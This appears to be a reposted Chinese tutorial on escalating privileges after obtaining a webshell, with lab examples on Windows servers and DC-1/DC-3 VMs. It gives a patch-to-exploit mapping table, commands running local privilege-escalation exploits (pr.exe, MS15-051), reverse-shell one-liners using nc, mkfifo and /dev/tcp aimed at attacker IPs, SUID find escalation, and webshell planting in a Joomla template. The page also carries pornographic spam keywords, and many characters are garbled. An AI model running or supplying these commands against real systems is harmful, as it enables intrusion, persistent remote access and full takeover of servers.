日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

服務器提權

 

當拿到WebShell 之后,下?步?什么?

權限提升

通過一些最初的漏洞利?途徑,攻擊者將獲得?定的訪問權限。接著,攻擊者將逐步探

查其破壞的系統來獲得?最初更多的權限,以期望從其他賬戶訪問敏感信息,甚?獲得

對整個系統的完全管理控制。當攻擊者以這種?式擴?其最初的未經授權訪問的權限

時,將其?為稱為權限提升攻擊。簡單來說,就是獲取?最初更多的權限,甚?系統權限。

 

?平權限提升(越權)

我們假設攻擊者已經獲得了在線銀?賬戶的訪問權限,他的?的是竊取?錢,但他從這?賬戶中竊

取的?錢并不多。這時,他就會尋找信息或者嘗試各種漏洞利?途徑來獲得對其他賬戶的訪問權

限。這稱之為?平權限提升,因為攻擊者是在具有相似權限的賬戶中橫向移動。

 

垂直權限提升

通常攻擊者的動機是完全控制計算機系統(管理員權限),以便可以任意使?系統。當攻擊者?先從

被攻擊的?戶賬戶開始并能夠將其擁有的單??戶擴?或提升完全管理權限或“根”權限時,我們稱

這類攻擊為垂直權限提升。

 

windows 提權

針對于很多windows 系統,有時候會安裝Web 套件(phpStudy),Web 套件的權限是?較?的。

操作系統漏洞提權

根據沒有修補的補丁號碼,直接提權即可。

補丁:kb

漏洞公告:MS

補丁與漏洞對照表

KB2360937 MS10-084
KB2478960 MS11-014KB2507938 MS11-056KB2566454 MS11-062KB2646524 MS12-003KB2645640 MS12-009KB2641653 MS12-018KB944653 MS07-067KB952004 MS09-012 PR
KB971657 MS09-041KB2620712 MS11-097KB2393802 MS11-011kb942831 MS08-005KB2503665 MS11-046KB2592799 MS11-080KB956572 MS09-012 巴?烤?
KB2621440 MS12-020KB977165 MS10-015 Ms Viru
KB4013081 MS17-017KB3139914 MS16-032KB3124280 MS16-016KB3134228 MS16-014KB3079904 MS15-097KB3077657 MS15-077KB3045171 MS15-051KB3000061 MS14-058KB2829361 MS13-046KB2850851 MS13-053 EPATHOBJ 0day 限32位
KB2707511 MS12-042 sysret -pid
KB2124261 KB2271195 MS10-065 IIS7
KB3198234 MS16-135KB970483 MS09-020 IIS6
KB3031432 MS15-015

Windows Server 2003:

服務器提權

 

Window Server 2008訪問:

password:black

服務器提權

 


服務器提權

 


服務器提權

 

未執行,權限過低

服務器提權

 

手動上傳一個提權工具:

服務器提權

 


服務器提權

 

systeminfo>C:WindowsTempa.txt&(for %i in (KB3057191 KB2840221 KB3000061
KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type
C:WindowsTempa.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a
C:WindowsTempa.txt

 

服務器提權

 

根據補丁與漏洞對照表,可選擇PR 提權。(具體提權原理涉及到Windows 系統底層知識,此處不再贅述,只需要使?提權EXP 即可)

服務器提權

 

/c C:/Inetpub/ewebeditorv280/uploadfile/pr.exe "whoami"

 

服務器提權

 

Windows Server 2008:

執?以下命令

systeminfo>C:WindowsTempa.txt&(for %i in (KB3124280 KB3143141 KB3134228
KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851KB2707511 KB970483 KB2124261 KB2271195 KB3031432) do @type
C:WindowsTempa.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a
C:WindowsTempa.txt

根據補丁對照表,我們選擇MS15-051。

上傳EXP (注意上傳到可寫?錄)并提權!

服務器提權

 

數據庫提權

核?思路:利?數據庫執?系統命令。

MSSQL 提權

需要提供sa ?戶密碼。

 

服務器提權

 

MySQL 提權

需要知道root ?戶密碼。
MySQL udf 提權MySQL mof 提權
服務器提權

 


服務器提權

 


服務器提權

 

反彈Shell

由于WebShell (正向Shell)是基于HTTP 的,不是持久性鏈接。

可以通過反彈Shell 的?法獲得持久性連接(基于TCP 協議的),?便與對?進?通信。

反彈shell ,讓對?主動來連接“我”。

windows 平臺

windows 平臺需要借助 nc.exe ?具。

# 本地監聽 2333 端?
nc.exe -lnvp 2333
ncat -lnvp 2333
# 服務器端反彈Shell
nc.exe -e cmd.exe 192.168.10.10 2333
ms15-051.exe "nc.exe -e cmd.exe 192.168.16.104 2333"

 

服務器提權

 


服務器提權

 

反彈成功:

服務器提權

 

提權:

服務器提權

 

linux平臺

在獲得?標系統WebShell 的情況下

# 本地監聽2333 端?
ncat -lnvp 2333
# 服務端反彈shellnc -e /bin/bash 192.168.16.100 2333
不需要-e參數的情況:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.100 2333
>/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.16.100 2333
>/tmp/f
/bin/sh -i >& /dev/tcp/192.168.16.100/2333 0>&1

Linux 提權

SUID 提權

?標環境:DC1

服務器提權

 

SUID 的概念:具有SUID 標識的命令,在執?期間擁有所有者權限。

特點:簡單、快速。

進?交互式Shell

Python --version
python -c 'import pty;pty.spawn("/bin/bash")'

系統中具有SUID 標識的命令都有哪些

find / -perm -4000 2>/dev/null
www-data@DC-1:/var/www$ ls -alh /usr/bin/find
ls -alh /usr/bin/find-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/find
www-data@DC-1:/var/www$
# find 命令在執?期間具有root 權限

?find 命令調?bash

find /tmp/ajest -exec "/bin/bash" ;
find /tmp/ajest -exec "/bin/sh" ;

其他可以提權(調?Shell)命令

vim
gitnmap...

注意:先前文章已有詳細介紹,這里不再贅述!

操作系統漏洞提權

?標環境:DC3

服務器提權

 


服務器提權

 


服務器提權

 


服務器提權

 

searchsploit joomla 3.7.0
服務器提權

 

getShell:

寫入一句話木馬,通過蟻劍連接:

# 如果以管理員身份登錄joomla ,就可以編輯后臺腳本(php)?件。
# 修改?站后臺腳本?件的位置
Extensions|Templates|Templates|Beez3 Details and Files
http://192.168.16.109/templates/beez3/html/config.php

 

服務器提權

 


服務器提權

 

普通權限,提權:

上傳提權腳本

服務器提權

 

.sh:檢查系統中存在哪些可以利用的提權漏洞

服務器提權

 


服務器提權

 

提權成功:

服務器提權

 

獲取DC3的flag:

服務器提權

 

=== Well Done!===

分享到:
標簽:服務器
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定